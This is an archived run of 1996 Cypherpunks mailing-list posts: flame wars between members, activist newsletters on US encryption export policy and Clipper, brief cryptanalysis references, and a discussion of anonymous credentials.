"E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU> writes:
> 	I seem to recall someone predicting that China and other such countries
> would set up an internal net with strict controls. Good prediction... I would
> be surprised to see Cuba recruited to it, for instance, although North Korea
> doesn't appear likely (too insular).

A typical ignorant U.S. attitude towards Cuba... I received e-mail from Cuba
over the Internet back in 1989.  They're not afraid of it.  The U.S. is.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 21 Oct 1996 21:40:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,500,000 Moslems
In-Reply-To: <Pine.SUN.3.91.961021210404.21193D-100000@crl5.crl.com>
Message-ID: <koN7VD37w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort <sandfort@crl.com> writes:
>
> > You have to beg. You have to grovel. You have to prove yourselves
> > worthy of the honor.
>
> So it IS intellectual dishonesty and cowardice.  I thought so.

Tsk tsk. You're not begging. You're not groveling. How do you plan
to convince me that you're worthy?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "C. H. Lim" <chlim@gandalf.asiapac.net>
Date: Mon, 21 Oct 1996 10:04:47 -0700 (PDT)
To: red <noorsham@tm.net.my>
Subject: Re: Don't ask why, thank you.
Message-ID: <199610211635.AAA17618@gandalf.asiapac.net>
MIME-Version: 1.0
Content-Type: text/plain


Well said ! Users please take note about abuse of system.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Tue, 22 Oct 1996 01:38:10 -0700 (PDT)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,500,000 Moslems
Message-ID: <3.0b36.32.19961022013215.011b1604@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:08 PM 10/21/96 -0700, Sandy Sandfort wrote:

>On Mon, 21 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
>
>> You have to beg. You have to grovel. You have to prove yourselves
>> worthy of the honor.
>
>So it IS intellectual dishonesty and cowardice.  I thought so.
>Is there anyone on the list who thinks Dimitri is a man?

Emotionally:  no
Biologically: maybe  (There is that unexplained trip to Sweden.)

I think that he should look into Trepanning, Phrenology, or both opon his
trip to the Bay area.  (When and if he ever goes...)

Actually Vulis has proved his colors over and over opon the net.  That is
why he gets so little respect here and elsewhere.

Maybe he thinks that you are all planning some sort of welcome out of
"Deliverance" or something...  ("We're gonna make you squeal like a modem,
boy!")  Explains the request for banjo players on some of the other lists,
however...


---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Mon, 21 Oct 1996 22:44:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: INFO:Congress continues to push hard in the pro-encryption fight! (10/20/96)
Message-ID: <199610220544.BAA16865@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


=============================================================================
          ____                  _              _   _
         / ___|_ __ _   _ _ __ | |_ ___       | \ | | _____      _____
        | |   | '__| | | | '_ \| __/ _ \ _____|  \| |/ _ \ \ /\ / / __|
        | |___| |  | |_| | |_) | || (_) |_____| |\  |  __/\ V  V /\__ \
         \____|_|   \__, | .__/ \__\___/      |_| \_|\___| \_/\_/ |___/
                    |___/|_|

           LETTER FROM 20 MEMBERS OF CONGRESS ON NEW CLIPPER PLAN
             LETTER TO THE NET FROM SENATOR CONRAD BURNS (R-MT)
          LAW ENFORCEMENT NOW TRACKING CRIMES INVOLVING ENCRYPTION
		          http://www.crypto.com/

                          Date: October 21, 1996

         URL:http://www.crypto.com/            crypto-news@panix.com
           If you redistribute this, please do so in its entirety,
                         with the banner intact.
-----------------------------------------------------------------------------
Table of Contents
        Introduction
	Letter from 20 members of Congress on new Clipper plan
	Letter to the net from Senator Conrad Burns (R-MT)
	Law enforcement now tracking crimes involving encryption
        How to receive crypto-news
        Press contacts

-----------------------------------------------------------------------------
INTRODUCTION

As we look back at the last legislative session, it is amazing the progress
we've made.  As we build supporters for the pro-encryption forces in Congress
we move the ball farther down the field.

If you called, wrote, testified, or even just stayed involved in the issue
this year, realize that you've made a significant difference in the way this
issue went.  

It's not the end, though.  We get a break for a couple of weeks and then
Congress will be back, and ready to take up this issue again.  Pro-encryption
activists are gearing up the "My Lock, My Key" campaign for next year's fight.
You can help by ensuring that you have told us who your member of Congress
is.

You never know, you might get a call or an email from one of us to help
convince your legislator about the benefits of privacy and encryption!

Participate in the "My Lock, My Key" Adopt-Your-Legislator campaign at
http://www.crypto.com !

----------------------------------------------------------------------------
LETTER FROM 20 MEMBERS OF CONGRESS ON NEW CLIPPER PLAN

Congress of the United States
Washington, D.C.  20515
October 15,1996


The Honorable Michael Kantor
Secretary
Department of Commerce
Washington, D.C.  20230

Dear Secretary:

We write to express our serious concerns about the Administration's most
recent policy announcement on export restrictions on encryption technology.

First we agree with the October 4, 1996, New York Times editorial that
characterized the Administration's plan as "needlessly restrictive and
probably unworkable" and (though better than previous Administration
proposal) "risks doing more harm than good."  We recognize that this issue
involves a careful balancing of commercial, consumer, law enforcement and
national security considerations.  However, the well-respected 1996 report
by the National Research Council on this matter emphasized that U.S. law
enforcement and national security would be enhanced -- not weakened -- by
broader use of stronger U.S. encryption technologies both at home and
abroad.  Furthermore, the report stressed that efforts to control
international trade in encryption technologies will only be effective if
implemented on a comprehensive, multilateral basis.

Unfortunately, the Administration's most recent encryption initiative
shortchanges both U.S. business and law enforcement interests.  The
proposal is flawed for four reasons: it fails to recognize that top-down,
government-imposed policies are doomed to defeat: export policies must be
directly linked, or indexed, to advances in technology; export controls
must be fully multilateral in order to be effective; and export control
decisions will be further delayed by granting the FBI new veto authority
over U.S. exports.

We fear these defects will continue to leave U.S. companies at a
disadvantage in the world market, leave users of U.S. encryption uncertain
about the security of their information and leave U.S. law enforcement and
national security agencies behind the cryptography-curve.

Although we were not consulted in the formulation of this policy, we
nevertheless hope that in the coming months you will work with us and
industry, consumer and user groups to refine it further.  In addition to
conducting oversight hearing in the next Congress on the Administration's
proposal, we also want to assure you that we will continue to pursue
legislative solutions toward this end.


Sincerely,

[signed]

Sen. Ron Wyden (D-OR)
Sen. Conrad Burns (R-MT)
Sen. Trent Lott (R-MS)
Sen. Larry Pressler (R-SD)
Sen. Lauch Faircloth (R-NC)
Sen. Barbara Boxer (D-CA)
Sen. Pete Domenici (R-NM)
Sen. John Ashcroft (R-MO)
Sen. Alan Simpson(R-WY)
Sen. Patty Murray (D-WA)
Sen. Don Nickles (R-OK)
Sen. Larry Craig (R-ID)
Sen. Craig Thomas (R-WY)
Sen. Kay Bailey Hutchison (R-TX)
Rep. Zoe Lofgren (D-CA)
Rep. Sonny Bono (R-CA)
Rep. Howard Coble (R-NC)
Rep. Steve Chabot (R-OH)
Rep. Bob Goodlatte (R-VA)
Rep. Bob Barr (R-GA)

-----------------------------------------------------------------------------
LETTER TO THE NET FROM SENATOR CONRAD BURNS (R-MT)

[We were informed that this net was for the net community, not specifically
 for Jonah Seiger.  We bring it to you.  -Shabbir]

>From Conrad_Burns@burns.senate.gov Fri Oct 18 17:35:35 1996
>Date: Fri, 18 Oct 96 17:49:32 EST
>To: jseiger@cdt.org
>Subject: To Interested Members of the Internet Community:

     I am writing to thank you for all your help and support of my effort 
     this year to pass legislation to enhance privacy and security on the 
     Internet.
     
     As you all know by now, the 104th Congress adjourned before it had a 
     chance to act on S. 1726, the Promotion of Commerce Online in the Digital 
     Era Act of 1996.  The bill, which was co-sponsored by Senators Leahy 
     (D-VT), Pressler (R-SD), Lott (R-MS), Wyden (D-OR) and many other 
     Senators from both parties, would have encouraged the widespread 
     availability of strong, easy to use privacy and security tools for 
     Internet Users.
     
     Although the Senate was not able to act on Pro-CODE this year, our 
     efforts have laid the groundwork for real reform of US encryption policy 
     in the 105th Congress.  And despite significant opposition from the 
     administration, Netizens had a significant impact on the Congressional 
     debate on the encryption issue.  I am honored to have helped to arrange 
     the first ever Cybercasts of Congressional hearings, and I enjoyed the 
     many online discussions I had with Netizens.  Together, we have helped 
     to show the Congress that the Internet user community can and should 
     have a voice in debates over critical Internet policy issues.
     
     Finally, just days before adjournment, the Administration announced 
     yet another encryption policy initiative.  The proposal continues to 
     insist on key escrow as a condition for lifting encryption export 
     controls, and raises numerous questions about privacy and 
     competitiveness.
     
     This debate is not over by any stretch of the imagination.  I intend 
     to move forward on pro-encryption legislation soon after the 105th 
     Congress begins in January.
     
     You can find out more about this issue by visiting my web site 
     (http://www.senate.gov/~burns). You can also visit the Encryption 
     Policy Resource Page (http://www.crypto.com/) and the Internet Policy 
     Coalition page (http://www.privacy.org/ipc/). Set up by experts to 
     provide resources on the encryption policy debate, these sites also 
     contain information on how you can get more involved.
     
     Thanks again for all your support. Next year, with your help, we can 
     reach a commonsense solution to the critical policy crisis on 
     encryption.
     
     Sincerely,
     
     U. S. Senator Conrad Burns

-----------------------------------------------------------------------------
LAW ENFORCEMENT NOW TRACKING CRIMES INVOLVING ENCRYPTION

[This was forwarded to us by one of our many encryption supporters with
 a stronger legal background.  The summary of it seems to be that someone
 has decided to start tracking at crimes that involve encryption.  Expect
 these numbers to be used against us next year in the debate over crypto.
 -Shabbir]

>From:XXXXXXXXXX

Check out title V of HR 3723, just signed into law by Clinton.  It
expressly directs that

a) all criminal presentence reports (the written story-line/history
given to the judge on which the sentence is calculated) shall include
info on whether crypto was used to obstruct justice/commit crime, and

b) the Sentencing Comm'n (the folks who write the rules) start looking
at this issue, almost surely with a view to eventually writing
Guidelines that would bump up sentences of perps who made the mistake
of using crypto.

Other parts of the bill make various changes -- I can't tell how
substantial -- to sec. 1030, the main do-not-hack/crack statute.  I'm
not worried about this right now, since what little I've seen looks
fairly cosmetic.

-----------------------------------------------------------------------------
HOW TO RECEIVE CRYPTO-NEWS

To subscribe to crypto-news, sign up from our WWW page (http://www.crypto.com)
or send mail to majordomo@panix.com with "subscribe crypto-news" in the body
of the message.  To unsubscribe, send a letter to majordomo@panix.com with
"unsubscribe crypto-news" in the body.

-----------------------------------------------------------------------------
PRESS CONTACT INFORMATION

Press inquiries on Crypto-News should be directed to
	Shabbir J. Safdar (VTW) at +1.718.596.2851 or shabbir@vtw.org
	Jonah Seiger (CDT) at +1.202.637.9800 or jseiger@cdt.org

-----------------------------------------------------------------------------
End crypto-news
=============================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Palacios <editor@cdt.org>
Date: Mon, 21 Oct 1996 23:10:35 -0700 (PDT)
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.36 - Congress Promises Action on Encryption Next Year
Message-ID: <326C6578.3317@cdt.org>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 36
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 36                      October 22, 1996

 CONTENTS: (1) Crypto Wrap-Up
           (2) Senator Burns' Sends Open Letter to Net Community
           (3) Bi-Partisan Group of 20 Members of Congress Raise Questions
               about Administration's Latest Encryption Initiative
           (4) How to Subscribe/Unsubscribe
           (5) About CDT, contacting us

  ** This document may be redistributed freely with this banner intact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
         ** This document looks best when viewed in COURIER font **
-----------------------------------------------------------------------------

(1) END OF SESSION WRAP-UP OF CRYPTO POLICY REFORM EFFORTS

In two letters released this week, Members of Congress have promised to
renew their efforts to reform US encryption policy when Congress returns in
January. An open letter to the Internet Community from Senator Conrad Burns
(R-MT), along with a letter from 20 Republican and Democratic members of
both the House and Senate sent to Commerce Secretary Mickey Kantor on
October 15, are attached below.

The letters cap off an active year in which the Internet community made
real progress towards reforming US encryption policy to promote privacy and
security on the Internet. While the Administration continues to promote key
escrow and export controls, a growing segment of Congress has recognized
the importance of encryption policy reform to the viability of the Internet
and the future of privacy in the information age.  This growing bi-partisan
support, along with an increasingly mobilized Net community, has resulted
in several significant accomplishments:

* Three bills designed to promote privacy and security on the Internet
  were introduced in the House and Senate:

  - The Burns/Leahy "Encrypted Communications Privacy Act" (S. 1587)
  - The Goodlatte/Eshoo "Security and Freedom through Encryption (SAFE)
    Act" (HR 3011), and
  - The Burns/Leahy/Pressler "Promotion of Commerce Online in the
    Digital Era (Pro-CODE) Act" (S. 1726).

  The bills, which would have relaxed export controls on encryption
  technology and prevented the government from imposing "key-escrow"
  schemes domestically, enjoyed broad bi-partisan support.

* Congress held four hearings on encryption reform legislation, and
  heard testimony from privacy advocates, cryptographers, computer
  industry leaders, and others.  These hearings provided a critical
  opportunity for the Internet community to make its case on the need
  for encryption policy reform.

* Through online forums and the first ever cybercasts of Congressional
  encryption hearings, the voice of the Internet user community is
  finally beginning to be heard in Congress, and is helping to educate
  the Congress about the importance of encryption.

* The Adopt your Legislator Campaign (http://www.crypto.com/) is linking
  Netizens with members of Congress to create a dialogue about the
  encryption issue.

* Nearly 9000 Netizens have signed the online petition
  (http://www.crypto.com/petition) in support of encryption policy
  reform.

* Leaders from the computer and communications industry joined with
  members of Congress, public interest organizations from across the
  political specturm, and the Internet community in Stanford California
  on July 1 to raise awareness about the need for encryption policy
  reform.

* Other developments include progress on three ongoing legal challenges to
the encryption export controls, efforts by privacy advocates to impact the
encryption debate in the international encryption policies through the
OECD, and the long awaited National Research Council Report which
criticized current US encryption policy as "failing to meet the needs of an
information age society."

Despite these accomplishments, supporters of encryption policy reform still
have a long way to go. In late October, the Clinton Administration
announced yet another encryption policy initiative relying on export
controls and "key-recovery" systems. As the Administration continues to
push its plans to satisfy law enforcement concerns, the Internet community
must be ready to work hard to protect privacy and security on the Internet.
Fortunately, as a result of our efforts this year, we have strong and
supportive allies in Congress.

When Congress returns in January, expect a renewed effort to enact serious
encryption policy reform legislation.  With your help, we can ensure that
the Internet develops into a secure platform for free expression, commerce,
and privacy.

WHAT YOU CAN DO NOW:

Congress and the Administration are now focused on the elections.  Help
raise the voice of the Internet community and educate our elected officials
about the importance of privacy and security on the Internet.

* ADOPT YOUR LEGISLATOR - Join an innovative online campaign designed to
  help Netizens create an ongoing dialogue with their elected officials
  on critical Internet policy issues like encryption policy reform

  http://www.crypto.com/adopt/adopt.cgi?genre=crypto

* SIGN THE PETITION - Add your name to the online petition and join the
  fight for privacy and security on the Internet.  Nearly 9000 Netizens
  have signed on so far.

  http://www.crypto.com/petition/

-----------------------------------------------------------------------

(2) AN OPEN LETTER TO THE INTERNET COMMUNITY FROM SENATOR BURNS

Senator Conrad Burns (R-MT), who along with Senator Patrick Leahy (D-VT)
led the fight this year for the Pro-CODE bill, asked us to forward the
following letter to the Internet community:

 X-POP3-Rcpt: jseiger@mailserver
 From: Conrad_Burns@burns.senate.gov
 Date: Fri, 18 Oct 96 17:49:32 EST
 To: jseiger@cdt.org
 Subject: To Interested Members of the Internet Community:

     I am writing to thank you for all your help and support of my
     effort this year to pass legislation to enhance privacy and
     security on the Internet.

     As you all know by now, the 104th Congress adjourned before it had
     a chance to act on S. 1726, the Promotion of Commerce Online in the
     Digital  Era Act of 1996.  The bill, which was co-sponsored by
     Senators Leahy (D-VT), Pressler (R-SD), Lott (R-MS), Wyden (D-OR)
     and many other Senators from both parties, would have encouraged
     the widespread availability of strong, easy to use privacy and
     security tools for Internet Users.

     Although the Senate was not able to act on Pro-CODE this year, our
     efforts have laid the groundwork for real reform of US encryption
     policy in the 105th Congress.  And despite significant opposition
     from the administration, Netizens had a significant impact on the
     Congressional debate on the encryption issue.  I am honored to have
     helped to arrange the first ever Cybercasts of Congressional
     hearings, and I enjoyed the many online discussions I had with
     Netizens.  Together, we have helped to show the Congress that the
     Internet user community can and should have a voice in debates over
     critical Internet policy issues.

     Finally, just days before adjournment, the Administration announced
     yet another encryption policy initiative.  The proposal continues
     to insist on key escrow as a condition for lifting encryption
     export controls, and raises numerous questions about privacy and
     competitiveness.

     This debate is not over by any stretch of the imagination.  I
     intend to move forward on pro-encryption legislation soon after the
     105th Congress begins in January.

     You can find out more about this issue by visiting my web site
     (http://www.senate.gov/~burns). You can also visit the Encryption
     Policy Resource Page (http://www.crypto.com/) and the Internet
     Policy Coalition page (http://www.privacy.org/ipc/). Set up by
     experts to provide resources on the encryption policy debate, these
     sites also contain information on how you can get more involved.

     Thanks again for all your support. Next year, with your help, we
     can reach a commonsense solution to the critical policy crisis on
     encryption.

     Sincerely,

     U. S. Senator Conrad Burns

-----------------------------------------------------------------------

(3) BI-PARTISAN GROUP OF 20 MEMBERS OF CONGRESS RAISE QUESTIONS ABOUT
    ADMINISTRATION'S LATEST ENCRYPTION INITIATIVE

Last week, a bi-partisan group of 20 members from both houses of Congress
sent the attached letter to Commerce Secretary Mickey Kantor expressing
their concerns about the Administration's latest encryption policy
initiative (see http://www.cdt.org/crypto for details).

The members, many of whom were co-sponsors of the Burns/Leahy Promotion of
Commerce Online in the Digital Era "Pro-CODE" Act (S. 1726) or the
Goodlatte/Eshoo Security and Freedom through Encryption "SAFE" Act (HR.
3011), called the latest administration effort "flawed" and pledged to
continue to pursue legislation to reform US encryption policy.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                     Congress of the United States
                       Washington, D.C.  20515

October 15, 1996


The Honorable Michael Kantor
Secretary
Department of Commerce
Washington, D.C.  20230

Dear Secretary:

We write to express our serious concerns about the Administration's most
recent policy announcement on export restrictions on encryption technology.

First we agree with the October 4, 1996, New York Times editorial that
characterized the Administration's plan as "needlessly restrictive and
probably unworkable" and (though better than previous Administration
proposal) "risks doing more harm than good."  We recognize that this issue
involves a careful balancing of commercial, consumer, law enforcement and
national security considerations.  However, the well-respected 1996 report
by the National Research Council on this matter emphasized that U.S. law
enforcement and national security would be enhanced -- not weakened -- by
broader use of stronger U.S. encryption technologies both at home and
abroad.  Furthermore, the report stressed that efforts to control
international trade in encryption technologies will only be effective if
implemented on a comprehensive, multilateral basis.

Unfortunately, the Administration's most recent encryption initiative
shortchanges both U.S. business and law enforcement interests.  The
proposal is flawed for four reasons: it fails to recognize that top-down,
government-imposed policies are doomed to defeat: export policies must be
directly linked, or indexed, to advances in technology; export controls
must be fully multilateral in order to be effective; and export control
decisions will be further delayed by granting the FBI new veto authority
over U.S. exports.

We fear these defects will continue to leave U.S. companies at a
disadvantage in the world market, leave users of U.S. encryption uncertain
about the security of their information and leave U.S. law enforcement and
national security agencies behind the cryptography-curve.

Although we were not consulted in the formulation of this policy, we
nevertheless hope that in the coming months you will work with us and
industry, consumer and user groups to refine it further.  In addition to
conducting oversight hearing in the next Congress on the Administration's
proposal, we also want to assure you that we will continue to pursue
legislative solutions toward this end.


Sincerely,

[signed]

Sen. Ron Wyden (D-OR)
Sen. Conrad Burns (R-MT)
Sen. Trent Lott (R-MS)
Sen. Larry Pressler (R-SD)
Sen. Lauch Faircloth (R-NC)
Sen. Barbara Boxer (D-CA)
Sen. Pete Domenici (R-NM)
Sen. John Ashcroft (R-MO)
Sen. Alan Simpson(R-WY)
Sen. Patty Murray (D-WA)
Sen. Don Nickles (R-OK)
Sen. Larry Craig (R-ID)
Sen. Craig Thomas (R-WY)
Sen. Kay Bailey Hutchison (R-TX)
Rep. Zoe Lofgren (D-CA)
Rep. Sonny Bono (R-CA)
Rep. Howard Coble (R-NC)
Rep. Steve Chabot (R-OH)
Rep. Bob Goodlatte (R-VA)
Rep. Bob Barr (R-GA)

------------------------------------------------------------------------

(4) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
nearly 10,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------

(5) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.36                                           10/22/96
-----------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 22 Oct 1996 03:26:36 -0700 (PDT)
To: "Erik E. Fair" <fair@clock.org>
Subject: Re: Reno at FCBA
In-Reply-To: <v0300780cae91bce08361@[17.255.9.110]>
Message-ID: <Pine.SUN.3.91.961022032418.26307D-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


In my experience, C-SPAN has already decided their programming for that
day (I don't know if it includes covering Reno's FCBA talk or not) but
that shouldn't prevent you from calling Terry Murphy, the vice president
of programming at C-SPAN, at 202-737-3220. 

Cheers,

Declan


On Mon, 21 Oct 1996, Erik E. Fair wrote:

> Perhaps C-SPAN can be convinced to cover this talk? Congress is not in
> session, after all...
> 
> 	Erik
> 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Tue, 22 Oct 1996 03:46:28 -0700 (PDT)
To: Jüri Kaljundi <jk@stallion.ee>
Subject: Re: Prof Shamir arrested
Message-ID: <3.0b36.32.19961022034515.00e5a308@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:00 PM 10/22/96 +0300, Jüri Kaljundi wrote:
> Mon, 21 Oct 1996, Rabid Wombat wrote:
>
>> Or is this the Avi Shamir who broke FEAL-8?
>
>Can you tell more of this? There is an Windows disk encryption utility
>called Teamware Crypto that uses FEAL-8. This program is quite popular in
>Europe, distributed and made by ICL Data.

The attacks on FEAL are pretty lengthy.  _Applied Cryptography_ 2nd edition
by Bruce Schneier has a list of attacks on page 311.  The Shamir attack is
not the one to worry about.  Matsui and Yamagishi have an attack that
breaks it in 2^15 known plaintexts.

If you do not have a copy, I can dig up the references on it.  (It is too
late/early for me to do it clearly at this point...)

Hope that helps.

---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 23 Oct 1996 08:51:26 -0700 (PDT)
To: norm@netcom.com
Subject: Re: cypherpunks ftp site
In-Reply-To: <v03010500ae91bba23301@DialupEudora>
Message-ID: <199610220515.GAA00372@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Norman Hardy <norm@netcom.com> writes:
> I am trying to get some code from <ftp.csua.berkeley.edu:pub/cypherpunks>.
> I get:
> 
> ftp> get README.MIRRORS
> 200 PORT command successful.
> 425 Can't create data socket (128.32.43.51,20): Address already in use.
> ftp>
> 
> Any suggestions to how to get eliptic.src and elliptic.doc reported to be
> at <ftp.csua.berkeley.edu:pub/cypherpunks/ciphers>? I searched AltaVista.

I'd suggest getting them from the european mirror of said ftp site:

	ftp://idea.sec.dsi.unimi.it/pub/security/crypt/cypherpunks/

(looks like an automated mirror, and includes everything, including
DO_NOT_EXPORT warnings:-)

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 22 Oct 1996 06:39:58 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,500,000 Moslems
In-Reply-To: <koN7VD37w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961022061727.26530B-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 22 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Tsk tsk. You're not begging. You're not groveling. How do you plan
> to convince me that you're worthy?

I have no such plan because I feel nothing but moral, cultural,
social and intellectual superiority to Dimitri.  I invited him to
California out of curiosity.  I studied slime mold in biology
class for the same reason.  He has been made a generous offer.  
It still stands.  It's his decision to be either a man our a 
mouse (or a slime mold).  If he grows some gonads, I'll be very
surprised but pleased.  In the meantime, I expect he will keep up 
his cowardly, shoot-from-ambush attacks.  No matter, we've all 
seen worse.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 22 Oct 1996 06:01:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Timmy May is a jerk
In-Reply-To: <199610212159.OAA01056@miron.vip.best.com>
Message-ID: <7H87VD38w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May continues to post nonsensical praises in his name using
an anonymous remailer....

Timmy May <anonymous@miron.vip.best.com> writes:

> Tim May's early support of the cypherpunk concept has helped
> advance the culture of humanity! A true scholar, Tim analyzes
> the various ideas presented to the cypherpunks list, and gives
> his honest opinion, even when that opinion is not popular. In
> doing so, Tim displays truly noble courage.

Timmy May is an ignorant coward. He's got nothing better to do,
so he starts up flame wars on this mailing list. He can't contribute
anything crypto-relevant because he knows nothing about cryptography.

> Unlike some others on this list, Tim has not sought to make purely
> personal attacks of the other inhabitants of the list and has shown
> impeccable restraint in doing so.

This is a lie. Anyone who's been subscribed to this mailing list for
a while knows that Timmy May posts to most personal attacks (inlcuiding
attacks on his many enemies' religion and ethnicity), lies, fabricated
quotes, flame bait, and overall noise.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Tue, 22 Oct 1996 09:12:04 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: one-body, one-cert
Message-ID: <199610221611.JAA27979@crypt>
MIME-Version: 1.0
Content-Type: text/plain


[This is picking up a discussion from the SPKI list on the topic of
anonymous credentials.  I think cypherpunks is a more appropriate forum.]

From: Carl Ellison <cme@cybercash.com>
> Yes.  This protects me from the evil CA.  However, the original posting
> person wanted to make sure that once he had seen bad behavior on my part
> (where "I" am identified by my DNA) that every future use of any key by me
> will gain me no access to his service.
>
> I believe these two desires are fundamentally opposed -- irreconcilable.
> If someone does a bad thing with some key I'm supposed to control, then I
> want to be able to write that key off and get another one to give me
> access.  If *I* do the bad thing, then he doesn't want me ever to get
> access again.
>
> This is resolvable only if we have a way to detect the DNA behind the actor
> -- but we don't.  All we have are keys which a person controls -- until he
> doesn't.

I think in a system like this, participants would need to understand the
limitations and design the protocols with them in mind.  Ideally, getting
access to someone else's keys would be made very difficult, more so than
it is today, since the consequences could be so much more drastic.

It would be as though evil spirits roamed the world and could invade the
consciousness of careless people, taking over their bodies and forcing
them to commit horrendous acts.  In such a world we could expect people
to take whatever careful precautions are possible to avoid such threats.

Furthermore, systems which apply punishments for bad behavior would have
to be aware of the possibility of such occurances.  It would generally
not be appropriate to impose draconian consequences for a single bad act.
Rather, the possibility would always have to be considered that such
actions were not the fault of the apparent perpetrator.

We might expect to see systems in which single instances of misbehavior
